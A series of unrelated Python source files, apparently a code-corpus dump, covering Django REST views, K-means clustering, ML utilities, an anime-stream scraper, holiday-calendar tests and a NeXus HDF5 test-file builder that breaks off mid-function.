so that users won't have access to models that are not the default or don't belong to them!
"""
class VendorView(ListCreateAPIView):
serializer_class = VendorSerializer
model = Vendor
filter_fields = ('name', 'uuid')
def get_queryset(self):
return self.model.objects.filter(user=self.request.user)
class MeasurementView(ListAPIView):
# Users are not allowed to create measurements, only can choose
# whatever is on the default
serializer_class = MeasurementReadOnlySerializer
model = Measurement
filter_fields = ('name', 'uuid')
queryset = Measurement.objects.all()
class IngredientView(ListCreateAPIView):
serializer_class = IngredientSerializer
model = Ingredient
filter_fields = ('name', 'half_life_minutes', 'uuid')
def get_queryset(self):
return self.model.objects.filter(user=self.request.user)
class IngredientCompositionView(ListCreateAPIView, ReadOrWriteSerializerChooser):
read_serializer_class = IngredientCompositionReadOnlySerializer
write_serializer_class = IngredientCompositionCreateSerializer
model = IngredientComposition
filter_class = IngredientCompositionFilter
def get_serializer_class(self):
return self._get_read_or_write_serializer_class()
def get_queryset(self):
return self.model.objects.filter(user=self.request.user)
class SupplementsListView(ListCreateAPIView, ReadOrWriteSerializerChooser, UUIDDeleteMixin, UUIDUpdateMixin):
read_serializer_class = SupplementReadSerializer
write_serializer_class = SupplementCreateUpdateSerializer
update_serializer_class = SupplementCreateUpdateSerializer
model = Supplement
filter_class = SupplementFilter
def get_serializer_class(self):
return self._get_read_or_write_serializer_class()
def get_queryset(self):
# prefetch any compositions that exist to speed this up
ingredient_compositions_queryset = IngredientComposition.objects.filter(user=self.request.user)
return self.model.objects.filter(user=self.request.user).prefetch_related(Prefetch('ingredient_compositions',
ingredient_compositions_queryset))
class UserSupplementStackViewSet(ListCreateAPIView, ReadOrWriteSerializerChooser, UUIDDeleteMixin, UUIDUpdateMixin):
model = UserSupplementStack
write_serializer_class = UserSupplementStackCreateUpdateSerializer
read_serializer_class = UserSupplementStackReadSerializer
update_serializer_class = UserSupplementStackCreateUpdateSerializer
filter_class = UserSupplementStackFilter
def get_serializer_class(self):
return self._get_read_or_write_serializer_class()
def get_queryset(self):
return self.model.objects.filter(user=self.request.user).prefetch_related('compositions')
class UserSupplementStackCompositionViewSet(
ListCreateAPIView, ReadOrWriteSerializerChooser, UUIDDeleteMixin, UUIDUpdateMixin
):
model = UserSupplementStackComposition
write_serializer_class = UserSupplementStackCompositionCreateUpdateSerializer
read_serializer_class = UserSupplementStackCompositionReadSerializer
update_serializer_class = UserSupplementStackCompositionCreateUpdateSerializer
filter_class = UserSupplementStackCompositionFilter
def get_serializer_class(self):
return self._get_read_or_write_serializer_class()
def get_queryset(self):
return self.model.objects.filter(user=self.request.user).select_related('supplement')
| 4,698 | 1,282 |
# flake8: noqa - this is until we take care of the F401 violations with respect to __all__ & sphinx
from .mlrun_interface import MLRunInterface
from .model_handler import ModelHandler
from .types import ExtraDataType, IOSampleType, ModelType, PathType
| 253 | 75 |
import numpy as np
from scipy.spatial import distance
import random
def mu_generator(X, K):
# Function to initialize the cluster centers
# The input is the training data X and the number of cluster centers
mu = []; rand_keys = []
for _ in range(K):
rand = random.randint(0, len(X)-1)
# The while loop prevents the random key to be repeated
# as we want unique cluster centers
while rand in rand_keys:
rand = random.randint(0, len(X)-1)
rand_keys.append(rand)
mu.append(X[rand])
mu = np.array(mu)
return mu
def K_Means(X, K, mu):
# This function is used to train our K-Means clustering algorithm and
# return the converged cluster centers
if len(mu) == 0:
# If the initial clusters are not initilaized we call the mu_generator( )
mu = mu_generator(X, K)
clusters = {}
# Keeping the track of the cluster centers
updated_mu = mu.copy()
for cluster in range(K):
# The clusters ranges from 0 to K-1
clusters[cluster] = []
for row in X:
least_dist = float("inf"); cluster_idx = None
for idx in range(len(mu)):
# Computing the eucledian distance between the sample and the cluster centers
euclid_dist = distance.euclidean(row, mu[idx])
# Finding the least distance between the input sample and the cluster center
# and appending the sample to the corresponding cluster
if euclid_dist <= least_dist:
least_dist = euclid_dist
cluster_idx = idx
clusters[cluster_idx].append(row)
for cluster in range(K):
# if the cluster is empty then continue
if len(clusters[cluster]) == 0:
continue
for dim in range(len(X[0])):
# Computing the average of the clusters to find the new cluster centers
avg = sum([i[dim] for i in clusters[cluster]])/len(clusters[cluster])
updated_mu[cluster][dim] = avg
if np.all(mu == updated_mu):
# If the updated cluster centers is equal to the original cluster
# centers stop the training process and return the cluster centers
return updated_mu
# else call again the K_Means( ) with the updated clusters as input
return(K_Means(X, K, updated_mu))
def K_Means_better(X, K):
# This funcion calls the K_Means algorithm multiple times to find the best converged
# cluster centers
cluster_centers = []; better_mu = {}
for _ in range(int(len(X)/2)):
# We use this loop to create multiple sets of cluster centers
rand_mu = mu_generator(X, K)
cluster_centers.append(rand_mu)
for idx in range(len(cluster_centers)):
# We compute the converged cluster centers for each of the cluster in cluster_centers
mu = (K_Means(X, K, cluster_centers[idx]))
# converting the list of lists to tuples of tuples so can use them as keys to dictionary
tmp = tuple(tuple(i) for i in mu)
# Computing how many times the converged cluster centers have been repeated and returning
# the cluster center with the highest vote
if tmp in better_mu.keys():
better_mu[tmp] += 1
else:
better_mu[tmp] = 1
cluster_centers = [(value,key) for key, value in better_mu.items()]
final_cluster = np.array(max(cluster_centers)[1])
return final_cluster
| 3,456 | 981 |
import asyncio
import os
from _version import __version__
def _print_version():
print(f'tele2-profit v{__version__} by archie')
def run_main(main):
try:
_print_version()
event_loop = asyncio.get_event_loop()
future = asyncio.ensure_future(main())
event_loop.run_until_complete(future)
if 'system' in dir(os):
os.system('pause')
except KeyboardInterrupt:
pass
| 435 | 145 |
'''
Author: Liu Xin
Date: 2021-11-13 19:11:06
LastEditors: Liu Xin
LastEditTime: 2021-11-25 15:44:12
Description: 静态工具库
FilePath: /CVMI_Sementic_Segmentation/utils/static_common_utils.py
'''
import os
import random
import numpy as np
import torch
import torch.backends.cudnn as cudnn
import warnings
from socket import gethostname
def set_random_seeds():
"""
@description : 设置所有的随机数种子
@param :
@Returns :
"""
seed = 6000
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.cuda.manual_seed_all(seed) # if you are using multi-GPU.
np.random.seed(seed) # Numpy module.
random.seed(seed) # Python random module.
torch.manual_seed(seed)
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
def is_method_overridden(method, base_class, derived_class):
"""检查基类的方法是否在派生类中被重写(copied by mmcv)
Args:
method (str): the method name to check.
base_class (type): the class of the base class.
derived_class (type | Any): the class or instance of the derived class.
"""
assert isinstance(base_class, type), \
"base_class doesn't accept instance, Please pass class instead."
if not isinstance(derived_class, type):
derived_class = derived_class.__class__
base_method = getattr(base_class, method)
derived_method = getattr(derived_class, method)
return derived_method != base_method
def getuser():
"""Get the username from the environment or password database.
First try various environment variables, then the password
database. This works on Windows as long as USERNAME is set.
"""
for name in ('LOGNAME', 'USER', 'LNAME', 'USERNAME'):
user = os.environ.get(name)
if user:
return user
# If this fails, the exception will "explain" why
import pwd
return pwd.getpwuid(os.getuid())[0]
def get_host_info():
"""Get hostname and username.
Return empty string if exception raised, e.g. ``getpass.getuser()`` will
lead to error in docker container
"""
host = ''
try:
host = f'{getuser()}@{gethostname()}'
except Exception as e:
warnings.warn(f'Host or user not found: {str(e)}')
finally:
return host
def mkdir_or_exist(dir_name, mode=0o777):
if dir_name == '':
return
dir_name = os.path.expanduser(dir_name)
os.makedirs(dir_name, mode=mode, exist_ok=True)
def symlink(src, dst, overwrite=True, **kwargs):
if os.path.lexists(dst) and overwrite:
os.remove(dst)
os.symlink(src, dst, **kwargs)
def build_work_dir_suffix(global_cfg, data_cfg):
info_dict = dict(
bz=global_cfg.batch_size,
gpus=global_cfg.gpus,
optimizer_name= global_cfg.optimizer.name,
lr = global_cfg.optimizer.lr,
lr_sche=global_cfg.lr_config.policy,
dataset=data_cfg.name
)
formated_list = [ f"{key}_{value}" for key, value in info_dict.items()]
return ".".join(formated_list)
| 3,060 | 1,082 |
import csv
def get_receivers():
"""
Return a list of receivers here
"""
with open("receivers.csv") as fin:
reader = csv.reader(fin)
receivers = [row[0] for row in reader]
return receivers
| 230 | 71 |
import re
from util.Episode import Episode
from bs4 import BeautifulSoup
from extractors.jwplayer_extractor import JWPlayerExtractor
from scrapers.base_scraper import BaseScraper
from util.Color import printer
class GoGoAnimeScraper(BaseScraper):
def __init__(self, url, start_episode, end_episode, session, gui=None, resolution="480"):
super().__init__(url, start_episode, end_episode, session, gui)
self.resolution = resolution
self.extractor = JWPlayerExtractor(None, self.session)
self.anime_id = None
self.api_link_bases = ['https://ajax.gogocdn.net/ajax/load-list-episode',
'https://ajax.apimovie.xyz/ajax/load-list-episode']
self.__set_anime_id()
def __set_anime_id(self):
response = self.session.get(self.url)
if response.status_code == 200:
soup_html = BeautifulSoup(response.content, "html.parser")
movie_id_tag = soup_html.find("input", attrs={"id": "movie_id"})
if movie_id_tag is not None:
self.anime_id = movie_id_tag["value"]
def __get_episode_data(self):
for base_link in self.api_link_bases:
api_link = base_link + "?ep_start=" + str(self.start_episode) + "&ep_end=" + str(
self.end_episode) + "&id=" + self.anime_id
response = self.session.get(api_link)
if response.status_code == 200:
return response.content
return None
def __get_page_url(self, href):
base_url = re.search("(.*)/category/", self.url).group(1)
# print(base_url)
src = base_url + href
# print(src)
return src
def __set_stream_url(self, episode):
response = self.session.get(episode.page_url)
if response.status_code == 200:
soup_html = BeautifulSoup(response.content, "html.parser")
item_tag = soup_html.find("li", attrs={"class": "anime"}).find("a")
streamer_url = item_tag["data-video"]
if "https" not in streamer_url:
streamer_url = "https:" + streamer_url
streamer_resp = self.session.get(streamer_url)
if streamer_resp.status_code == 200:
sources = self.extractor.extract_sources(streamer_resp.text)
src = ""
for source in sources:
if "m3u8" in source:
src = source
break
if src != "":
res_link_id = self.extractor.get_resolution_link(src, self.resolution)
stream_base = re.search("(.*)/[\S]+\.m3u8", src).group(1)
episode.download_url = stream_base + "/" + res_link_id
print("stream url:", episode.download_url)
return True
return False
def __collect_episodes(self):
printer("INFO", "Extracting page URLs...", self.gui)
episodes = []
if self.anime_id is not None:
data = self.__get_episode_data()
if data is not None:
soup_html = BeautifulSoup(data, "html.parser")
anchor_tags = soup_html.findAll("a", href=True)
for anchor in anchor_tags:
href = anchor["href"].strip()
epi_no = int(href.split("-")[-1])
if epi_no < self.start_episode or epi_no > self.end_episode:
continue
episode = Episode("Episode - " + str(epi_no), "Episode - " + str(epi_no))
episode.is_direct = False
episode.page_url = self.__get_page_url(href)
val = self.__set_stream_url(episode)
if val:
episodes.append(episode)
else:
printer("ERROR", "Failed to collect download link for " + episode.title, self.gui)
return episodes
def get_direct_links(self):
try:
episodes = self.__collect_episodes()
if len(episodes) > 0:
return episodes
else:
return None
except Exception as ex:
printer("ERROR", str(ex), self.gui)
return None
| 4,309 | 1,294 |
'''
Constants necessary for the correct execution of this bot.
here, most of the values of the environment variables are extracted.
'''
from os import getenv
from pathlib import Path
# Base settings
PROJECT_PATH = Path(__file__).resolve().parent
UI_RESOURCES_PATH = PROJECT_PATH / 'ui_resources'
BOT_TOKEN = getenv('mrdtoken')
EXTENSIONS_LIST = [
'mr_dale.admin'
]
# Configuring the logging mechanism
LOG_FORMAT = {
'format': '%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]'
}
LOGGING_SETTINGS = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {'default': LOG_FORMAT},
'handlers': {
'info_console_handler': {
'class': 'logging.StreamHandler',
'level': 'INFO',
'formatter': 'default',
'stream': 'ext://sys.stdout'
},
'error_console_handler': {
'class': 'logging.StreamHandler',
'level': 'ERROR',
'stream': 'ext://sys.stderr'
}
},
'loggers': {
'mr_dale': {
'level': 'INFO',
'handlers': ['info_console_handler', 'error_console_handler'],
'propagate': False
},
'discord': {
'level': 'ERROR',
'handlers': ['error_console_handler'],
'propagate': False
}
}
}
| 1,355 | 433 |
# needs a parameter to specify which training record to display
import matplotlib as mpl
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import matplotlib.pyplot as plt
import functions as fn
import sys
#from matplotlib.backends.backend_pdf import PdfPages
tdata, ttarget, tlabel = fn.get_training_data()
i = int(sys.argv[1])
tempdata = np.array([[0,0,0]])
for j in range(300):
if (tdata[i][j] == 0).all():
continue
temp = np.expand_dims(tdata[i][j], axis=0)
tempdata = np.append(tempdata, temp, axis=0)
tempdata = np.delete(tempdata, 0, 0)
t_data = tempdata.transpose((1, 0))
mpl.rcParams['legend.fontsize'] = 10
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.set_xlabel('x')
ax.set_ylabel('t')
ax.set_zlabel('y')
ax.view_init(0, 90)
ax.set_title(i)
x = t_data[0]
y = t_data[1]
t = t_data[2]
x_target = np.linspace(ttarget[i][0], ttarget[i][0], 1000)
y_target = np.linspace(np.mean(t_data[1]), np.mean(t_data[1]), 1000)
#y_target = np.linspace(ttarget[i][1], ttarget[i][1], 1000)
t_target = np.linspace(np.min(t_data[2]), np.max(t_data[2]), 1000)
label = ['fake', 'real']
plt_label = label[int(tlabel[i][0])]
ax.plot(x, t, y, label=plt_label)
ax.plot(x_target, t_target, y_target, label="target: "+str(ttarget[i][0])+", "+str(ttarget[i][1]))
ax.legend()
plt.show() | 1,305 | 572 |
# coding: utf-8
import datetime
import unittest
import jpholiday
class TestYear2014(unittest.TestCase):
def test_holiday(self):
"""
2014年祝日
"""
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 1, 1)), '元日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 1, 13)), '成人の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 2, 11)), '建国記念の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 3, 21)), '春分の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 4, 29)), '昭和の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 5, 3)), '憲法記念日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 5, 4)), 'みどりの日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 5, 5)), 'こどもの日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 5, 6)), 'みどりの日 振替休日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 7, 21)), '海の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 9, 15)), '敬老の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 9, 23)), '秋分の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 10, 13)), '体育の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 11, 3)), '文化の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 11, 23)), '勤労感謝の日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 11, 24)), '勤労感謝の日 振替休日')
self.assertEqual(jpholiday.is_holiday_name(datetime.date(2014, 12, 23)), '天皇誕生日')
def test_count_month(self):
"""
2014年月祝日数
"""
self.assertEqual(len(jpholiday.month_holidays(2014, 1)), 2)
self.assertEqual(len(jpholiday.month_holidays(2014, 2)), 1)
self.assertEqual(len(jpholiday.month_holidays(2014, 3)), 1)
self.assertEqual(len(jpholiday.month_holidays(2014, 4)), 1)
self.assertEqual(len(jpholiday.month_holidays(2014, 5)), 4)
self.assertEqual(len(jpholiday.month_holidays(2014, 6)), 0)
self.assertEqual(len(jpholiday.month_holidays(2014, 7)), 1)
self.assertEqual(len(jpholiday.month_holidays(2014, 8)), 0)
self.assertEqual(len(jpholiday.month_holidays(2014, 9)), 2)
self.assertEqual(len(jpholiday.month_holidays(2014, 10)), 1)
self.assertEqual(len(jpholiday.month_holidays(2014, 11)), 3)
self.assertEqual(len(jpholiday.month_holidays(2014, 12)), 1)
def test_count_year(self):
"""
2014年祝日数
"""
self.assertEqual(len(jpholiday.year_holidays(2014)), 17)
| 2,720 | 1,283 |
from dataclasses import dataclass
from typing import List, Union, Iterator, Optional, Dict, Any, Tuple
import h5py
import numpy as np
from enum import Enum
from contextlib import contextmanager
import json
from scippneutron.file_loading._json_nexus import LoadFromJson, MissingDataset
h5root = Union[h5py.File, h5py.Group]
def _create_nx_class(group_name: str, nx_class_name: str, parent: h5root) -> h5py.Group:
nx_class = parent.create_group(group_name)
nx_class.attrs["NX_class"] = nx_class_name
return nx_class
@contextmanager
def in_memory_hdf5_file_with_two_nxentry() -> Iterator[h5py.File]:
nexus_file = h5py.File('in_memory_events.nxs',
mode='w',
driver="core",
backing_store=False)
try:
_create_nx_class("entry_1", "NXentry", nexus_file)
_create_nx_class("entry_2", "NXentry", nexus_file)
yield nexus_file
finally:
nexus_file.close()
@dataclass
class EventData:
event_id: Optional[np.ndarray]
event_time_offset: Optional[np.ndarray]
event_time_zero: Optional[np.ndarray]
event_index: Optional[np.ndarray]
event_time_zero_unit: Optional[Union[str, bytes]] = "ns"
event_time_zero_offset: Optional[Union[str, bytes]] = "1970-01-01T00:00:00Z"
event_time_offset_unit: Optional[Union[str, bytes]] = "ns"
@dataclass
class Log:
name: str
value: Optional[np.ndarray]
time: Optional[np.ndarray] = None
value_units: Optional[Union[str, bytes]] = None
# From
# https://manual.nexusformat.org/classes/base_classes/NXlog.html?highlight=nxlog
# time units are non-optional if time series data is present, and the unit
# must be a unit of time (i.e. convertible to seconds).
time_units: Optional[Union[str, bytes]] = "s"
start_time: Optional[Union[str, bytes]] = None
scaling_factor: Optional[float] = None
class TransformationType(Enum):
TRANSLATION = "translation"
ROTATION = "rotation"
@dataclass
class Transformation:
transform_type: TransformationType
vector: np.ndarray
value: Optional[np.ndarray]
time: Optional[np.ndarray] = None
depends_on: Union["Transformation", str, None] = None
offset: Optional[np.ndarray] = None
value_units: Optional[Union[str, bytes]] = None
time_units: Optional[Union[str, bytes]] = None
@dataclass
class Detector:
detector_numbers: Optional[np.ndarray] = None
event_data: Optional[EventData] = None
log: Optional[Log] = None
x_offsets: Optional[np.ndarray] = None
y_offsets: Optional[np.ndarray] = None
z_offsets: Optional[np.ndarray] = None
offsets_unit: Optional[Union[str, bytes]] = None
depends_on: Optional[Transformation] = None
@dataclass
class Sample:
name: str
depends_on: Optional[Transformation] = None
distance: Optional[float] = None
distance_units: Optional[Union[str, bytes]] = None
ub_matrix: Optional[np.ndarray] = None
orientation_matrix: Optional[np.ndarray] = None
@dataclass
class Source:
name: str
depends_on: Union[Transformation, None, str] = None
distance: Optional[float] = None
distance_units: Optional[Union[str, bytes]] = None
@dataclass
class Chopper:
name: str
distance: float
rotation_speed: float
distance_units: Optional[str] = None
rotation_units: Optional[str] = None
@dataclass
class Link:
new_path: str
target_path: str
@dataclass
class DatasetAtPath:
path: str
data: np.ndarray
attributes: Dict[str, Any]
@dataclass
class Stream:
"""
Only present in the JSON NeXus file templates, not in HDF5 NeXus files.
Records where to find data in Kafka that are streamed during an experiment.
"""
# Where the builder should place the stream object
path: str
# The following members correspond to fields in stream object.
# Some of them may not be of interest to Scipp but are to other
# software which consume the json template, for example
# the Filewriter (https://github.com/ess-dmsc/kafka-to-nexus)
# Kafka topic (named data stream)
topic: str = "motion_devices_topic"
# Source name, allows filtering and multiplexing to different
# writer_modules by the filewriter software
source: str = "linear_axis"
# Tells filewriter which plugin to use to deserialise
# messages in this stream and how to write the data to file.
# For example the "f142" writer module deserialises messages which
# were serialised with the "f142" flatbuffer schema
# (https://github.com/ess-dmsc/streaming-data-types/) and
# writes resulting timeseries data to file as an NXlog
# (https://manual.nexusformat.org/classes/base_classes/NXlog.html)
writer_module: str = "f142"
# Deserialised values are expected to be of this type
type: str = "double"
# Values have these units
value_units: str = "m"
@dataclass
class Monitor:
name: str
data: np.ndarray
axes: List[Tuple[str, np.ndarray]]
events: Optional[EventData] = None
class InMemoryNeXusWriter:
def add_dataset_at_path(self, file_root: h5py.File, path: str, data: np.ndarray,
attributes: Dict):
path_split = path.split("/")
dataset_name = path_split[-1]
parent_path = "/".join(path_split[:-1])
dataset = self.add_dataset(file_root[parent_path], dataset_name, data)
for name, value in attributes.items():
self.add_attribute(dataset, name, value)
@staticmethod
def add_dataset(parent: h5py.Group, name: str,
data: Union[str, bytes, np.ndarray]) -> h5py.Dataset:
return parent.create_dataset(name, data=data)
@staticmethod
def add_attribute(parent: Union[h5py.Group, h5py.Dataset], name: str,
value: Union[str, bytes, np.ndarray]):
parent.attrs[name] = value
@staticmethod
def add_group(parent: h5py.Group, name: str) -> h5py.Group:
return parent.create_group(name)
@staticmethod
def add_hard_link(file_root: h5py.File, new_path: str, target_path: str):
try:
_ = file_root[new_path]
del file_root[new_path]
except KeyError:
pass
file_root[new_path] = file_root[target_path]
@staticmethod
def add_soft_link(file_root: h5py.File, new_path: str, target_path: str):
try:
_ = file_root[new_path]
del file_root[new_path]
except KeyError:
pass
file_root[new_path] = h5py.SoftLink(target_path)
numpy_to_filewriter_type = {
np.float32: "float32",
np.float64: "float64",
np.int8: "int8",
np.int16: "int16",
np.int32: "int32",
np.int64: "int64",
np.uint8: "uint8",
np.uint16: "uint16",
np.uint32: "uint32",
np.uint64: "uint64"
}
def _add_link_to_json(file_root: Dict, new_path: str, target_path: str):
new_path_split = new_path.split("/")
link_name = new_path_split[-1]
parent_path = "/".join(new_path_split[:-1])
nexus = LoadFromJson(file_root)
parent_group = nexus.get_object_by_path(file_root, parent_path)
link = {"type": "link", "name": link_name, "target": target_path}
existing_object = nexus.get_child_from_group(parent_group, link_name)
if existing_object is not None:
parent_group["children"].remove(existing_object)
parent_group["children"].append(link)
def _parent_and_name_from_path(file_root: Dict, path: str) -> Tuple[Dict, str]:
path_split = path.split("/")
name = path_split[-1]
parent_path = "/".join(path_split[:-1])
nexus = LoadFromJson(file_root)
parent_group = nexus.get_object_by_path(file_root, parent_path)
return parent_group, name
class JsonWriter:
def add_dataset_at_path(self, file_root: Dict, path: str, data: np.ndarray,
attributes: Dict):
parent_group, dataset_name = _parent_and_name_from_path(file_root, path)
dataset = self.add_dataset(parent_group, dataset_name, data)
for name, value in attributes.items():
self.add_attribute(dataset, name, value)
@staticmethod
def add_dataset(parent: Dict, name: str, data: Union[str, bytes,
np.ndarray]) -> Dict:
if isinstance(data, (str, bytes)):
dataset_info = {"string_size": len(data), "type": "string"}
elif isinstance(data, float):
dataset_info = {"size": 1, "type": "float64"}
elif isinstance(data, int):
dataset_info = {"size": 1, "type": "int32"}
else:
dataset_info = {
"size": data.shape,
"type": numpy_to_filewriter_type[data.dtype.type]
}
new_dataset = {
"type": "dataset",
"name": name,
"values": data,
"dataset": dataset_info,
"attributes": []
}
parent["children"].append(new_dataset)
return new_dataset
@staticmethod
def add_attribute(parent: Dict, name: str, value: Union[str, bytes, np.ndarray]):
if isinstance(value, (str, bytes)):
attr_info = {"string_size": len(value), "type": "string"}
elif isinstance(value, float):
attr_info = {"size": 1, "type": "float64"}
elif isinstance(value, int):
attr_info = {"size": 1, "type": "int64"}
else:
attr_info = {
"size": value.shape,
"type": numpy_to_filewriter_type[value.dtype.type]
}
name_and_value = {"name": name, "values": value}
parent["attributes"].append({**attr_info, **name_and_value})
@staticmethod
def add_group(parent: Dict, name: str) -> Dict:
new_group = {"type": "group", "name": name, "children": [], "attributes": []}
parent["children"].append(new_group)
return new_group
@staticmethod
def add_hard_link(file_root: Dict, new_path: str, target_path: str):
_add_link_to_json(file_root, new_path, target_path)
@staticmethod
def add_soft_link(file_root: Dict, new_path: str, target_path: str):
_add_link_to_json(file_root, new_path, target_path)
def add_stream(self, file_root: Dict, stream: Stream):
new_stream = {
"type": "stream",
"stream": {
"topic": stream.topic,
"source": stream.source,
"writer_module": stream.writer_module,
"type": stream.type,
"value_units": stream.value_units
}
}
nexus = LoadFromJson(file_root)
try:
group = nexus.get_object_by_path(file_root, stream.path)
except MissingDataset:
parent, name = _parent_and_name_from_path(file_root, stream.path)
group = self.add_group(parent, name)
group["children"].append(new_stream)
class NumpyEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.ndarray):
return obj.tolist()
return json.JSONEncoder.default(self, obj)
class NexusBuilder:
"""
Allows building an in-memory NeXus file for use in tests
"""
def __init__(self):
self._event_data: List[EventData] = []
self._detectors: List[Detector] = []
self._logs: List[Log] = []
self._instrument_name: Optional[str] = None
self._choppers: List[Chopper] = []
self._title: Optional[str] = None
self._start_time: Optional[str] = None
self._end_time: Optional[str] = None
self._sample: List[Sample] = []
self._source: List[Source] = []
self._hard_links: List[Link] = []
self._soft_links: List[Link] = []
self._writer = None
self._datasets: List[DatasetAtPath] = []
self._streams = []
self._monitors = []
def add_dataset_at_path(self, path: str, data: np.ndarray, attributes: Dict):
self._datasets.append(DatasetAtPath(path, data, attributes))
def _write_datasets(self, root: Union[Dict, h5py.File]):
for dataset in self._datasets:
self._writer.add_dataset_at_path(root, dataset.path, dataset.data,
dataset.attributes)
def add_stream(self, stream: Stream):
self._streams.append(stream)
def add_detector(self, detector: Detector):
self._detectors.append(detector)
def add_event_data(self, event_data: EventData):
self._event_data.append(event_data)
def add_log(self, log: Log):
self._logs.append(log)
def add_instrument(self, name: str):
self._instrument_name = name
def add_chopper(self, chopper: Chopper):
self._choppers.append(chopper)
def add_title(self, title: str):
self._title = title
def add_run_start_time(self, start_time: str):
self._start_time = start_time
def add_run_end_time(self, end_time: str):
self._end_time = end_time
def add_sample(self, sample: Sample):
self._sample.append(sample)
def add_source(self, source: Source):
self._source.append(source)
def add_hard_link(self, link: Link):
"""
If there is a group or dataset at the link path it will
be replaced by the link
"""
self._hard_links.append(link)
def add_soft_link(self, link: Link):
"""
If there is a group or dataset at the link path it will
be replaced by the link
"""
self._soft_links.append(link)
def add_component(self, component: Union[Sample, Source]):
# This is a little ugly, but allows parametrisation
# of tests which should work for sample and source
if isinstance(component, Sample):
self.add_sample(component)
elif isinstance(component, Source):
self.add_source(component)
def add_monitor(self, monitor: Monitor):
self._monitors.append(monitor)
@property
def json_string(self):
self._writer = JsonWriter()
root = {"children": []}
self._write_file(root)
return json.dumps(root, indent=4, cls=NumpyEncoder)
def create_json_file(self):
"""
Create a file on disk, do not use this in tests, it is intended to
be used as a tool during test development
"""
self._writer = JsonWriter()
root = {"children": []}
self._write_file(root)
with open("test_json.txt", "w") as json_file:
return json.dump(root, json_file, indent=4, cls=NumpyEncoder)
@contextmanager
def file(self) -> Iterator[h5py.File]:
# "core" driver means file is "in-memory" not on disk.
# backing_store=False prevents file being written to
# disk on flush() or close().
nexus_file = h5py.File('in_memory_events.nxs',
mode='w',
driver="core",
backing_store=False)
self._writer = InMemoryNeXusWriter()
try:
self._write_file(nexus_file)
yield nexus_file
finally:
nexus_file.close()
def _write_file(self, nexus_file: Union[h5py.File, Dict]):
entry_group = self._create_nx_class("entry", "NXentry", nexus_file)
if self._title is not None:
self._writer.add_dataset(entry_group, "title", data=self._title)
if self._start_time is not None:
self._writer.add_dataset(entry_group, "start_time", data=self._start_time)
if self._end_time is not None:
self._writer.add_dataset(entry_group, "end_time", data=self._end_time)
self._write_event_data(entry_group)
self._write_logs(entry_group)
self._write_sample(entry_group)
self._write_source(entry_group)
if self._instrument_name is None:
parent_group = entry_group
parent_path = "/entry"
else:
parent_group = self._write_instrument(entry_group)
parent_path = "/entry/instrument"
self._write_choppers(parent_group)
self._write_detectors(parent_group, parent_path)
self._write_datasets(nexus_file)
self._write_streams(nexus_file)
self._write_links(nexus_file)
self._write_monitors(nexus_file)
def create_file_on_disk(self, filename: str):
"""
Create a file on disk, do not use this in tests, it is intended to
be used as a tool during test development. Output file can be
explored using a tool such as HDFView.
"""
nexus_file = h5py.File(filename, mode='w')
self._writer = InMemoryNeXusWriter()
try:
self._write_file(nexus_file)
finally:
nexus_file.close()
def _write_links(self, file_root: Union[h5py.Group, Dict]):
for hard_link in self._hard_links:
self._writer.add_hard_link(file_root, hard_link.new_path,
hard_link.target_path)
for soft_link in self._soft_links:
self._writer.add_soft_link(file_root, soft_link.new_path,
soft_link.target_path)
def _write_sample(self, parent_group: Union[h5py.Group, Dict]):
for sample in self._sample:
sample_group = self._create_nx_class(sample.name, "NXsample", parent_group)
if sample.depends_on is not None:
depends_on = self._add_transformations_to_file(
sample.depends_on, sample_group, f"/entry/{sample.name}")
self._writer.add_dataset(sample_group, "depends_on", data=depends_on)
if sample.distance is not None:
distance_ds = self._writer.add_dataset(sample_group,
"distance",
data=sample.distance)
if sample.distance_units is not None:
self._writer.add_attribute(distance_ds, "units",
sample.distance_units)
if sample.ub_matrix is not None:
self._writer.add_dataset(sample_group,
"ub_matrix",
data=sample.ub_matrix)
if sample.orientation_matrix is not None:
self._writer.add_dataset(sample_group,
"orientation_matrix",
data=sample.orientation_matrix)
def _write_source(self, parent_group: Union[h5py.Group, Dict]):
for source in self._source:
source_group = self._create_nx_class(source.name, "NXsource", parent_group)
if source.depends_on is not None:
if isinstance(source.depends_on, str):
depends_on = source.depends_on
else:
depends_on = self._add_transformations_to_file(
source.depends_on, source_group, f"/entry/{source.name}")
self._writer.add_dataset(source_group, "depends_on", data=depends_on)
if source.distance is not None:
distance_ds = self._writer.add_dataset(source_group,
"distance",
data=source.distance)
if source.distance_units is not None:
self._writer.add_attribute(distance_ds, "units",
source.distance_units)
def _write_instrument(
self, parent_group: Union[h5py.Group, Dict]) -> Union[h5py.Group, Dict]:
instrument_group = self._create_nx_class("instrument", "NXinstrument",
parent_group)
self._writer.add_dataset(instrument_group, "name", self._instrument_name)
return instrument_group
def _write_detectors(self, parent_group: Union[h5py.Group, Dict], parent_path: str):
for detector_index, detector in enumerate(self._detectors):
detector_name = f"detector_{detector_index}"
detector_group = self._add_detector_group_to_file(
detector, parent_group, detector_name)
if detector.event_data is not None:
self._add_event_data_group_to_file(detector.event_data, detector_group,
"events")
if detector.log is not None:
self._add_log_group_to_file(detector.log, detector_group)
if detector.depends_on is not None:
depends_on = self._add_transformations_to_file(
detector.depends_on, detector_group,
